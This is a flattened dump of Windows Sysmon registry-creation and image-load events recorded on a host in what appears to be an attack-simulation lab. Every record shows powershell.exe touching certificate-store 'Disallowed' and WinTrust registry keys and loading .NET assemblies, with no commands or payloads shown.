12241200x80000000000000001530809Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530808Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530807Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530806Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530805Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530804Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530803Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530802Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530801Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530800Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530799Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530798Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530797Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530796Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530795Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530794Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530793Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530792Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530791Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530790Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530789Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530788Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530787Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530786Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530785Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530784Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530783Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530782Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530781Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530780Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530779Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530778Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530777Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530776Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530775Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530774Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530773Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530772Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530771Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530770Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\4576558f9b71a2bbc8a274844c5530c8\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=A8DA77D12ECE05B2F62E9C4953661141,SHA256=FC27E15E339A52EF8C0D829E7E6800365A1755A8F6DD1650018EA73CFC18996Ffalse-Unavailable 734700x80000000000000001530769Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\41c61395b8ebbe159552045c07ea1195\Microsoft.PowerShell.Commands.Utility.ni.dll10.0.14393.4225Microsoft Windows PowerShell Utility CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Commands.Utility.dllMD5=0725A9ACB655F7C9AD6997C2C656BBF0,SHA256=B7A2F679AB9A46B2B8FD0DD65FDDE0440BE2D0457C55468D750726AA0C0C806Dfalse